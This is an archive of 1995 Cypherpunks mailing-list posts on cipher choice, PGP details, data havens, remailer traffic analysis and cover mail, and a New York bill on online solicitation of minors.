From frissell at panix.com Thu Jan 12 07:41:08 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 12 Jan 95 07:41:08 PST Subject: Pornography, What is it? Message-ID: <199501121539.AA14480@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 06:29 PM 1/11/95 -0600, root wrote: >Article XIV (1868) > >Sec. 1. > >All persons born or naturalized in the United States, and subject to the >jurisdiction thereof, are citizens of the United States and of the States >wherein they reside. No state shall make or enforce any law which shall >abridge the privileges or immunities of citizens of the United States; >nor shall any State deprive any person of life, liberty, or property, >without due process of law; nor deny to any person within its jurisdiction >the equal protection of the laws. > >Where in there is the protection you speak of? I see no guarantee of my >Constitutional rights, only of privileges and immunities as granted >by the federal government. The courts have held that the term "liberty" in the XIVth Amendment includes the liberties protected by the body of the Constitution and the other Amendments. DCF - -- PGP signing encouraged by Private Idaho (for Windows Eudora) by Joel McNamara -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxVIOYVO4r4sgSPhAQHPfgP+PisOuBlvGgb96M5bjkVdIfDb2JEkb0Nb N4Uw9FoILGtUPibEphsJbRF4GpCd8qfHJvZjP5jTCLztCwo0r/kPc4qDKYPzRpVv EmZm2WwByOBSDqljJJAb3a7bC5b9vOEr2shr29u1apYmGl6sldvi4lTHYMjTOxI3 rUmivlpfsOc= =kTT1 -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Thu Jan 12 07:49:28 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 12 Jan 95 07:49:28 PST Subject: Multiple symetric cyphers In-Reply-To: <199501120502.VAA29808@largo.remailer.net> Message-ID: <199501121547.AA02187@poboy.b17c.ingr.com> > But selecting a single cipher is just as much a fixed policy as a > randomly selected one is. Far better to let the user pick a policy, > both about sent and accepted ciphers. 
If you do give the user control, what is an acceptable mechanical implementation? Let's say I have a file encryptor which allows the user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I require the user to tell that program what cypher was used to encrypt the file she wishes to decrypt? Is storing the cypher type as part of the encrypted file a weakness? -Paul -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### From eric at remailer.net Thu Jan 12 08:04:01 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:04:01 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501121602.IAA00806@largo.remailer.net> From: Censored Girls Anonymous 1. You have what I want or need. You have a _service_ I want to use. 8. Welcome to the world of data "coatchecking". "Data coatchecking" certainly has different connotations than "data haven". I think for marketing purposes, the name "data haven" is inaccurate. A data haven, one might expect, has semantic structure to it. Offsite storage is much less than a data haven; it's much more like a remote file system. Using the word "haven" to refer to a remote storage facility removes the connotation of ordinary usage, which, as we all know is a perfectly upright, normal, and (for those in the USA) a downright Capital-A _American_ thing to do. From the moment the data leaves their hands, until I return it, they have no right, nor I no obligation, to divulge anything about it. You don't want the operator of a remote storage facility revealing links about usage patterns of individuals, but as far as the data itself goes, there's no reason it couldn't be made public (there's also no good reason _to_ make it public, either). Someone who sends plaintext to a remote site is foolish. 
Eric

From eric at remailer.net Thu Jan 12 08:09:33 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:09:33 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID: <199501121608.IAA00812@largo.remailer.net>

   Of course, we're not just dealing with text. So the scheme has got to be changed a bit so as to be able to detect unencrypted GIFs, and mu-law files, and as yet to be determined unknown files.

Each of these data formats has its own regex recognizers available. Just apply them. The point, though, is to enforce the presumption that the remailer operator does not, in fact, look at the traffic in order to understand the content. You don't need a completely airtight algorithm in order to do this.

Eric

From eric at remailer.net Thu Jan 12 08:14:14 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:14:14 PST
Subject: How do I know if its encrypted?
In-Reply-To: <199501120646.WAA28573@ix2.ix.netcom.com>
Message-ID: <199501121612.IAA00824@largo.remailer.net>

   From: daleh at ix.netcom.com (Dale Harrison (AEGIS))

   It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guarantee the correct answer.

You don't always need the correct answer. You just need the correct answer most of the time. You're trying to create a presumption about behavior. Ensuring that you can't read almost all of the traffic is a pretty good way to assure people that you don't try to make sense of any of it. The fundamental purpose here is social communication about intent.

   Reliable remailer software will have to worry about false positives as well as false negatives; especially if it's a fee-for-service operation.

I just don't agree with this. If you feel it needful to install an entropy filter, expect that its failures will simply accrue to the general unreliability measurement for that remailer.
And there's no reason you couldn't publish the algorithm so that a user couldn't check the entropy for themselves in advance.

   Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic.

I don't design for the paranoid.

Eric

From jdwilson at gold.chem.hawaii.edu Thu Jan 12 08:18:16 1995
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Thu, 12 Jan 95 08:18:16 PST
Subject: Microsoft TrueName (tm) (fwd)
Message-ID: <199501121623.LAA23964@bb.hks.net>

>From: Censored Girls Anonymous
>To: cypherpunks at toad.com
>Subject: Re: Microsoft TrueName (tm)

>Praise Bob! The Rev. Ivan Stang's been preaching that for years!
>Long live the Slackmaster!

I wondered why one of the few registered hosts for Microsoft was called "Bob" - now it makes sense. (But they've got a good sized chunk of netblks registered...)

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 | finger for full PGP key >
" " / \ " |Honolulu, HI 96830 |====================================>
\" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From eric at remailer.net Thu Jan 12 08:24:36 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:24:36 PST
Subject: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID: <199501121623.IAA00846@largo.remailer.net>

   From: cactus at seabsd.hks.net (L. Todd Masco)

   >Strength is not right aspect. Global risk is reduced, simply because
   >the aggregate cost of a breach is reduced.

   Isn't it? If an attacker does not know what cipher is used and breaking each is computationally expensive (though not prohibitively so) doesn't that add extra complexity?

Suppose that several symmetric ciphers are used and that one of them is broken. You then attempt to break all of the messages; the ones that don't break are presumed to be one of the other ciphers. So it does nothing to improve strength. Note, though, that the _rest_ of the messages remain unbroken. I am assuming that it's unlikely that all of the ciphers will be broken simultaneously.

   Related: is there, in general or in any known specific cases, any loss of security in using sym. cipher A on ciphertext B (of another sym. cipher) with the same key? With different keys (I would think not, but I vaguely remember mention of something here long ago)?

If you use the same key, the size of exhaustive search does not increase.

Eric

From kevin.rock at njackn.com Thu Jan 12 08:32:00 1995
From: kevin.rock at njackn.com (kevin.rock at njackn.com)
Date: Thu, 12 Jan 95 08:32:00 PST
Subject: Pgp where?
Message-ID: <9501120952.0DVJZ00@njackn.com>

I think this is the correct board to put this message on, but since there are no messages to read here I might be wrong. Does anyone know where to locate the program (algorithm) Pretty Good Protection (PGP) ?
I've read about it in the local newspaper, in Scientific American and in the alternate news message area. It sounds like a good encryption scheme and I would like to explore its possibilities. Thanks for any assistance.

From eric at remailer.net Thu Jan 12 08:33:46 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:33:46 PST
Subject: Multiple symetric cyphers
In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com>
Message-ID: <199501121632.IAA00887@largo.remailer.net>

   From: paul at poboy.b17c.ingr.com (Paul Robichaux)

   Must I require the user to tell that program what cypher was used to encrypt the file she wishes to decrypt?

Only if you don't want to store the type alongside. See below.

   Is storing the cypher type as part of the encrypted file a weakness?

Well, it's no weaker than current systems. PGP stores the cipher type in the source code: it's always IDEA. One should allow, however, the cipher type to be empty alongside the data so that another tool can store cipher information.

Eric

From eric at remailer.net Thu Jan 12 08:38:56 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:38:56 PST
Subject: Data Havens..A consumer perspective
In-Reply-To:
Message-ID: <199501121637.IAA00893@largo.remailer.net>

   From: Nesta Stubbs

   > 3. I will let you do anything to the data you wish, so long as I
   > get it back intact.

   why would you give the haven owner free run? I mean naturally he does have free run with your data once he gets it,

That's exactly the reason, namely, to make the agreement between individuals match the underlying nature of information. This is different in the trust in silence about the user. This is also not to say that the operator can't undertake to make assurances about where bits go and don't go.

   I am sure you wouldn't want your data stored on a public access Unix system, or in plaintext.

So don't store it in plaintext. The operator of the data storage facility has no responsibility for this.
   if the datahaven is turned into a data broker

I don't know about you, but I don't like paying money for random bits.

   well what would be the purpose of this data haven you propose except as an extra storage space for data, like if you don't have space on your own drive?

Even when you've got enough of your own disk space, it's still subject to failure. Putting data in multiple places reduces the possibility of unrecoverable catastrophe.

Eric

From hfinney at shell.portal.com Thu Jan 12 09:01:09 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 12 Jan 95 09:01:09 PST
Subject: How do I know if its encrypted?
Message-ID: <199501121701.JAA24309@jobe.shell.portal.com>

The data haven concept as I understood it held data for public access in some form (for sale or for free) which would be illegal in some jurisdiction. This might include credit information that was older than the legal limit, libelous claims, damaging medical records, etc. Frankly, I suspect that most usages would be directed towards reducing, rather than increasing, individual privacy. So this is not an area I am interested in working towards.

The idea of offsite storage doesn't seem that helpful since you can just store the data on your own disk in encrypted form. Maybe if encryption gets outlawed it would be useful, but then you can't use encryption to communicate with the haven.

As far as remailers requiring encryption, one purpose would be to reduce complaints by making it impossible to send some kinds of messages which people would object to. It would be hard to post to usenet, for example, in a useful way. And mail to private individuals could not contain obvious obscenities or other objectionable material.

The problem with this is that if people become able to handle and deal with incoming encrypted mail in a transparent way, this restriction is no longer effective in the latter purpose. Someone could get encrypted hate mail and have it transparently decrypted and displayed just like normal mail. They will be just as upset as people are today when they get objectionable mail from the remailer.

As far as usenet posts, if a particular decryption key were widely and customarily used in a particular newsgroup, objectionable material could still be widely read if encrypted with that key. Tim May's example of a fake encrypted post containing inflammatory material is a good example of the heat which could occur, especially when the message is real and not a fake one like he did. So I don't think this restriction would really accomplish the desired goal except perhaps in the short term.

If the purpose is to have plausible deniability by the remailer operator, I feel we can still get that by publicizing the remailer software source, which has no provisions for manual filtering. A policy of sending only encrypted mail so that the operator can't filter would be no more acceptable to critics of anonymity than a policy of just not filtering at all.

Entropy checking is not adequate to detect encryption, as compressed files have maximal entropy as well. For these purposes, compression may be nearly as good as encryption, except that standard compression formats are already widely used. An entropy checker might well pass a gif, jpeg, or zip file, so this filter would by itself be useless to prevent posting of unencrypted graphics. It would probably have to be augmented at least by some checks for these special file formats.

Hal

From cactus at seabsd.hks.net Thu Jan 12 09:04:50 1995
From: cactus at seabsd.hks.net (L.
Todd Masco)
Date: Thu, 12 Jan 95 09:04:50 PST
Subject: Multiple symetric cyphers
Message-ID: <199501121709.MAA24434@bb.hks.net>

In article <199501121623.IAA00846 at largo.remailer.net>, Eric Hughes wrote:
>I am assuming that it's unlikely that all of the ciphers will be
>broken simultaneously.

Quick reasoning note: For forward secrecy, it's unnecessary that the ciphers be broken simultaneously; just that they are broken in the span of time between encryption and the attack.

--
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From warlord at MIT.EDU Thu Jan 12 09:13:28 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 12 Jan 95 09:13:28 PST
Subject: Multiple symetric cyphers
In-Reply-To: <199501121632.IAA00887@largo.remailer.net>
Message-ID: <9501121655.AA14127@toxicwaste.media.mit.edu>

> Well, it's no weaker than current systems. PGP stores the cipher type
> in the source code: it's always IDEA. One should allow, however, the
> cipher type to be empty alongside the data so that another tool can
> store cipher information.

Actually, a slight correction.
PGP does have an algorithm byte for the encryption algorithm; this byte is inside the RSA block. (It doesn't have to be RSA, either, but that's a different story). So long as you use a public key to encrypt, you get this byte. If you just use PGP -c, using the current implementation, you do not get a type byte. Oops.

My point is that although the current implementation doesn't have multiple encryption schemes, that doesn't mean that it can't have them...

-derek

From assets at alpha.c2.org Thu Jan 12 09:55:06 1995
From: assets at alpha.c2.org (Offshore Assets)
Date: Thu, 12 Jan 95 09:55:06 PST
Subject: Chain
Message-ID: <199501121752.JAA10878@infinity.c2.org>

I use Hal Finney's 'Chain' a lot: it is an easy way of automatically building a remailer chain. But it won't PGP correctly with the Usura and the Flame remailers because these two have e-mail addresses that have changed and/or are different from the addresses specified in their public keys (Usura, for instance, is now , but this is not the address given in its public key ID).

Is there a way for me in PGP to edit and update the information contained in the public keys of others? I would want to add an "also known as" line for 'Chain' to spot.

O.A.

From jrochkin at cs.oberlin.edu Thu Jan 12 10:01:26 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:01:26 PST
Subject: analysis of RemailerNet
Message-ID:

At 8:57 AM 01/12/95, Wei Dai wrote:
>Alice is sending mail to. After the first day, she can
>eliminate about half of the remailer users from the list of possible
>targets, because they, like the the random user above,
>received a mail even though Alice didn't send one out during the
>collection period of that batch. Now, since Eve can eliminate
>on average half of the list every day, Bob will be the only person left on
>that list after about (log base 2 of one million) = 20 days.
>
>Suppose Alice sent out some different numbers of cover e-mail:
[...]
> 3 log base 1 of 1,000,000 = infinity!

Yeah, I think it made sense. Let me try to rephrase what you are saying in English rather than math, to see if it's still what you are saying.

1) Attacker Eve wants to figure out who Alice is sending mail to.
2) She can weed people out by noting 'collection periods' where Alice sends mail, but certain people don't receive any mail, and eventually arrive at Bob.
3) If Alice sends mail out in _every_ collection period, perhaps just to the bit bucket, this method won't work, because there won't be any periods where Alice doesn't send mail out.

Hmmm. The basic idea here is simply that you should send out lots of cover mail, at least one piece in every collection period, to prevent this kind of attack. Best, a random number of cover pieces, but at least one every collection period.

Several thoughts:

1) If Alice and Bob are both corresponding with many people, things get more complicated. I tried to model it similarly to the way you modeled your simpler situation, but got confused quickly. This would be a good thing to look at. Alice sends and receives mail to several people other than Bob, and same with Bob. I'm not sure how this changes things, if at all.
2) In real life, it's more likely for an attacker to want to discover Alice knowing Bob than it is for him to want to discover Bob knowing Alice. It's Alice who is being anonymous here by using the anonymous RemailerNet, of course. I don't think this changes things either, but it's something to keep in mind.

From jamesd at netcom.com Thu Jan 12 10:04:26 1995
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 12 Jan 95 10:04:26 PST
Subject: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID:

>
> >Strength is not right aspect. Global risk is reduced, simply because
> >the aggregate cost of a breach is reduced.

On Thu, 12 Jan 1995, L. Todd Masco wrote:

> Isn't it?
> If an attacker does not know what cipher is used and breaking
> each is computationally expensive (though not prohibitively so) doesn't
> that add extra complexity?

The increase in strength, if each cypher was roughly equal, is merely order n, where n is the number of cyphers. If, as is likely, one of the cyphers required a billionfold less power to break than the others, you have decreased strength by an enormous factor.

The way to increase strength is to use a cypher, such as IDEA, which has a large key. Key size will increase strength by a factor of billions, not a factor of n.

Current key sizes are such that computationally expensive attacks do not work on symmetric cyphers. An attack has to be clever.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        http://nw.com/jamesd/
are. True law derives from this right, not from         James A. Donald
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From lmccarth at thor.cs.umass.edu Thu Jan 12 10:05:39 1995
From: lmccarth at thor.cs.umass.edu (L. McCarthy)
Date: Thu, 12 Jan 95 10:05:39 PST
Subject: Purpose of Data Havens
Message-ID: <199501121810.NAA25089@bb.hks.net>

Hal writes:
> The idea of offsite storage doesn't seem that helpful since you can just
> store the data on your own disk in encrypted form. Maybe if encryption
> gets outlawed it would be useful, but then you can't use encryption to
> communicate with the haven.

As Eric notes elsewhere, off-site backups are useful in general in case some physical calamity strikes your site. It seems to me that a data haven addresses a more aggressive threat model than this. Rather than just worrying about the act of a hacker / nature / etc. eradicating our local copies of data (encrypted or not), we're concerned about intelligent agents (human or electronic) attempting to commit genocide on all instances of some data we possess.

Scenario: June is a test engineer at Rockwell Intl. At the lab where she works, it is observed that some rubber O-rings being designed for the space shuttle are liable to crack, and lose their airtight seal, when exposed to the extremely low temperatures of space. The project is behind, so the researchers are instructed to proceed in spite of the problem. June encrypts the test results and deposits them in a data haven. Then she calls her boss's boss and offers a deal (whitemail ?). Either the part is redesigned, or she'll present the incriminating evidence to the New York Times. Even if Rockwell sends some goons to June's apartment while she's at work the next day, to reduce her laptop to solder, she still has the means to carry out her threat.

"Rikki don't lose that number - send it off in a letter to yourself"-Steely Dan

-L. Futplex McCarthy

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From jrochkin at cs.oberlin.edu Thu Jan 12 10:05:56 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:05:56 PST
Subject: Reefer madness
Message-ID:

At 9:35 AM 01/12/95, Russell Nelson wrote:
>misdemeanor. I spoke to Bob Penna, the legislative aide who
>researched and wrote up the bill for Bill Sears. He realizes that the
>Internet cannot reasonably be censored, and that the solution is to be
>able to punish people who do it (hence the felony) and to educate

I don't find that particularly reassuring. "being able to punish people who do it," is ultimately going to have to consist of preventing non-GAK encryption, in the minds of the Gubmint. You can't punish them if you can't catch them, and you can't catch them if they use strong encryption.

Well, in reality you still can catch them, after all no one can sexually assault anyone over the internet (yet, anyway). Sometime they've got to do something in person, and there's no encryption in a physical meeting, where everyone sees your TrueFace. But I'm not sure how much I trust the gubmint types to take this all into account, instead of just abolishing crypto on the typical four horsemen platform.

From jamesd at netcom.com Thu Jan 12 10:09:07 1995
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 12 Jan 95 10:09:07 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID:

On Thu, 12 Jan 1995, Jonathan Rochkind wrote:

> Of course, we're not just dealing with text. So the scheme has got to be
> changed a bit so as to be able to detect unencrypted GIFs, and mu-law
> files, and as yet to be determined unknown files. I don't know enough
> about what's being talked about to know if this entropy detecting stuff
> will generalize to non text files.

Graphics files are already compressed, so they pass the entropy test, but they start with a distinctive header.

The best way to stop graphics would be a volume limit per apparent source and per apparent destination. To program that is a bit like hard work.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        http://nw.com/jamesd/
are. True law derives from this right, not from         James A. Donald
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From warlord at MIT.EDU Thu Jan 12 10:13:28 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 12 Jan 95 10:13:28 PST
Subject: Chain
In-Reply-To: <199501121752.JAA10878@infinity.c2.org>
Message-ID: <9501121813.AA14895@toxicwaste.media.mit.edu>

> Is there a way for me in PGP to edit and update the information contained
> in the public keys of others?
> I would want to add an "also known as" line for 'Chain' to spot.

Sure, pgp -ke will do that for you.. It's just that the new ID will not be certified, and PGP will consider the key invalid as far as trust goes..

-derek

From jrochkin at cs.oberlin.edu Thu Jan 12 10:13:52 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:13:52 PST
Subject: Data Havens..A consumer perspective
Message-ID:

At 4:30 AM 01/12/95, Nesta Stubbs wrote:
>> 4. It is no concern (only idle curiosity maybe) where the data is parked.
>
>it matters a lot to me, that's the security of the data, what if your data
>is sem top secret plan to bomb the pentagon, and you are using the data
>haven to distribute to your band of anonymous terrorists, I am sure you
>wouldn't want your data stored on a public access Unix system, or in
>plaintext.

You shouldn't ever give the operator the info in plaintext. Encrypt it, public or otherwise, and distribute the key to your Band of Merry Men. Then it doesn't matter even it's sitting on a public access Unix system, no one can read it anyhow.

The main point of this kind of data haven seems to be providing you a remote location to store your data, in an anonymous way, so even if it does end up being found out, you can't be linked to it. I wouldn't trust the operator to do anything particular with the data other than keep it safe enough so I can retrieve it later, and I'd take the necessary precautions to account for that lack of trust. The only reason I'd trust him to even keep it safe for me, is because of reputation market.
If he routinely loses people's data, word is going to get around. On the other hand, if he routinely shows people's data to the FBI, no one is even going to know about it. I don't trust him not to routinely show the data to the FBI, or store it in public. Use encryption.

Of course there are different purposes for data havens, which would require more trust of the operator. But I'm not sure how well those are ever going to work, because I'd much rather trust my encryption than trust the operator.

From jrochkin at cs.oberlin.edu Thu Jan 12 10:19:31 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:19:31 PST
Subject: How do I know if its encrypted?
Message-ID:

At 12:01 PM 01/12/95, Hal wrote:
>The idea of offsite storage doesn't seem that helpful since you can just
>store the data on your own disk in encrypted form. Maybe if encryption
>gets outlawed it would be useful, but then you can't use encryption to
>communicate with the haven.

Hmm. I post through a long anonymous remailer chain to an appropriate newsgroup: "I have made an archive of state secrets (or trade secrets, for that matter, or pornography), available on data haven Wherever. Ask to receive the following file for a list of contents."

Seems it could be useful. Especially if you had some way of extracting digicash payment from it, in an anonymous way. But even if you didn't, perhaps you want to make this info available as a public service. I sure as heck wouldn't want it sitting on a hard drive in my bedroom.

From dfloyd at io.com Thu Jan 12 10:31:09 1995
From: dfloyd at io.com (dfloyd at io.com)
Date: Thu, 12 Jan 95 10:31:09 PST
Subject: Farewell for a bit
Message-ID: <199501121830.MAA09124@pentagon.io.com>

I need to work on the DH code, so I am unsubbing for a while. Please can the cheers, all right?
;-)

From nelson at crynwr.com Thu Jan 12 10:35:55 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 10:35:55 PST
Subject: Reefer madness
In-Reply-To:
Message-ID:

   Date: Thu, 12 Jan 1995 13:10:08 -0500
   From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)

   At 9:35 AM 01/12/95, Russell Nelson wrote:
   >misdemeanor. I spoke to Bob Penna, the legislative aide who
   >researched and wrote up the bill for Bill Sears. He realizes that the
   >Internet cannot reasonably be censored, and that the solution is to be
   >able to punish people who do it (hence the felony) and to educate

   Well, in reality you still can catch them, after all no one can sexually assault anyone over the internet (yet, anyway).

Mmmm, being the parent of two children, I have to disagree. The brain is the primary sexual organ, after all.

   Sometime they've got to do something in person, and there's no encryption in a physical meeting, where everyone sees your TrueFace. But I'm not sure how much I trust the gubmint types to take this all into account, instead of just abolishing crypto on the typical four horsemen platform.

Hey, I don't trust the gubmint either, that's why I called Bob to get an explanation. I really *don't* think that New York State plans to ban encryption, not now and not over this issue anyway. His thrust is 1) to have the legal authority to sufficiently punish someone who goes after children (which they don't have now), and 2) to educate guardians about the risks of untoward communications from adults to children.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)    | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From mark at unicorn.com Thu Jan 12 10:52:56 1995
From: mark at unicorn.com (Mark Grant)
Date: Thu, 12 Jan 95 10:52:56 PST
Subject: Reefer madness
Message-ID:

On Thu, 12 Jan 1995, Russell Nelson wrote:

> I really *don't* think that New York State plans to
> ban encryption, not now and not over this issue anyway. His thrust is
> 1) to have the legal authority to sufficiently punish someone who goes
> after children (which they don't have now), and 2) to educate guardians
> about the risks of untoward communications from adults to children.

But what happens if, say, a minor is solicited for sex when they are pretending to be older than they are ? Or if the solicitation comes via a remailer ? Or a minor with a grudge fakes email to show that someone attempted to get them to agree to sex/picture-taking or whatever ?

Once you pass laws making some forms of communication illegal, you're immediately getting into dodgy territory requiring is-a-person credentials and so on. That isn't necessarily a problem if it's voluntary (e.g. your kids' accounts might be set up to only accept mail from people who're certified to be under 18 or whatever), but governments are unlikely to do things that way.

Mark

From lmccarth at thor.cs.umass.edu Thu Jan 12 11:48:08 1995
From: lmccarth at thor.cs.umass.edu (L. McCarthy)
Date: Thu, 12 Jan 95 11:48:08 PST
Subject: Chain and Shifting Remailer Addresses
Message-ID: <199501121953.OAA26211@bb.hks.net>

Offshore Assets writes:
> I use Hal Finney's 'Chain' a lot:

Uh, I think you probably mean Lance Cottrell, not Hal -- unless Hal's also written a similar utility with an identical name, about which I haven't heard.

> [...] But it won't PGP correctly with the Usura
> and the Flame remailers because these two have e-mail addresses that
> have changed and/or are different from the addresses specified in their
> public keys (Usura, for instance, is now , but this
> is not the address given in its public key ID).

Alex de Joode posted a copy of the usura key edited to reflect the domain name change to alt.privacy.anon-server. It's presumably on the keyservers....

Oh, and the flame remailer passed away with the closure of the jpunix remailer, as far as I can tell. (I vaguely recall something to the effect that sinet.org is/was registered as a subdomain of jpunix.com, but I might well be wrong.)

Hope this helps.

-L. Futplex McCarthy

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From fhalper at pilot.njin.net Thu Jan 12 12:20:02 1995
From: fhalper at pilot.njin.net (Frederic Halper)
Date: Thu, 12 Jan 95 12:20:02 PST
Subject: Reefer madness
Message-ID: <9501122019.AA14798@pilot.njin.net>

mark at unicorn.com wrote:

But what happens if, say, a minor is solicited for sex when they are pretending to be older than they are ? Or if the solicitation comes via a remailer ? Or a minor with a grudge fakes email to show that someone attempted to get them to agree to sex/picture-taking or whatever ?

Once you pass laws making some forms of communication illegal, you're immediately getting into dodgy territory requiring is-a-person credentials and so on. That isn't necessarily a problem if it's voluntary (e.g.
your kids accounts might be set up to only accept mail from people who're certified to be under 18 or whatever), but governments are unlikely to do things that way. Any person no matter their age should be wary if someone solicits them for sex. I'm 16 years old and have been on the Internet for a little more than a year and I haven't nor have I met anyone who has been approached by a pedophile. The examples used are isolated incidents, which could have likely been prevented had they discussed it with their parents or tried to obtain more info about the person they were going to meet. -RH --------------------------------------------------------------------------------- Reuben Halper I'm not growing up, I'm just burnin' out." Montclair High - Green Day - Montclair, NJ E-mail: fhalper at pilot.njin.net PGP 2.6ui Public Key available upon request --------------------------------------------------------------------------------- From sandfort at crl.com Thu Jan 12 12:56:41 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 12 Jan 95 12:56:41 PST Subject: Reefer madness In-Reply-To: <9501122019.AA14798@pilot.njin.net> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 12 Jan 1995, Reuben Halper (or his dad, Frederic, posing as a kid) wrote: > . . . > I'm 16 years old and have been on the Internet for a little > more than a year and I haven't nor have I met anyone who has > been approached by a pedophile. . . Ever seen a Turkish prison film, Reuben? S a n d y With apologies to Peter Graves. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From unicorn at access.digex.net Thu Jan 12 13:03:28 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Thu, 12 Jan 95 13:03:28 PST
Subject: Data Havens..A consumer perspective
In-Reply-To:
Message-ID:

On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

> Date: Thu, 12 Jan 1995 02:32:06 -0600 (CST)
> From: Censored Girls Anonymous
> To: cypherpunks at toad.com
> Subject: Data Havens..A consumer perspective
>
>
> 1. You have what I want or need.

As far as what...? Data already in the haven? Storage capacity? Speed of link?

> 2. In order for me to let you store it, I will give it to you
> anyway you wish to get it.

Does this include on old style magnetic reel to reel? Clearly there has to be some simplicity of submission. I would further submit that many "consumers" will not want to store plaintext data, and thus "any way you wish to get it." quickly becomes unacceptable.

> 3. I will let you do anything to the data you wish, so long as I
> get it back intact.

Again, does this include storing it in a /pub/ dir on an ftp site in plaintext? No, there must be a clear stated policy of the site operator's method of storage.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

This ignores jurisdictional concerns that may have significant, even severe impact.

> 5. I would expect to pay money for the safekeeping of my data.

What kind of money? Digital postage? New currency? DM? $? This too is a simplistic representation of the real concern.

> 6. I would expect the longer you hold the data, the more it will cost.

I assume you mean day to day cost, not rates by data age? Though this brings up an interesting point, what would be the incentives served and created by charging on a phase in scale? i.e., what would be the result if a DH were to charge $ .05 a day for data that had been in the DH for over a month, and $ .09 a day for data over a year?
It would at the very least, increase traffic as old data was taken out and put back in to avoid the stepped up "latency" charge. If all the data was encrypted, would this help deter traffic analysis by imposing "productless" transactions resulting in no net change in the DH's holdings? Hmmmmm.

> 7. The only thing I am counting on is the data's timely retrieval.

And not its ability to be directed to specific parties, rather than the public at large? And not its ability to avoid traffic analysis? And not its ability to be multi or non-jurisdictional?

> 8. Welcome to the world of data "coatchecking".

I've lost several coats this way.

> Why make it more complex than this?

Why insist on this simplicity? Why not store it on your own machine if these are your only requirements?

> From the moment the data leaves their hands, until I return it,
> they have no right, nor I no obligation, to divulge anything about it.
> For they already would know, it would take a few minutes to retrieve it.

This was to be from a consumer's perspective I thought. In any event, this ignores the possibility of court ordered disclosure, availability to third and fourth parties, and traffic analysis concerns.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.

What you are talking about has little if anything to do with "Data Havens"; you're just selling storage space.

> Carol Anne

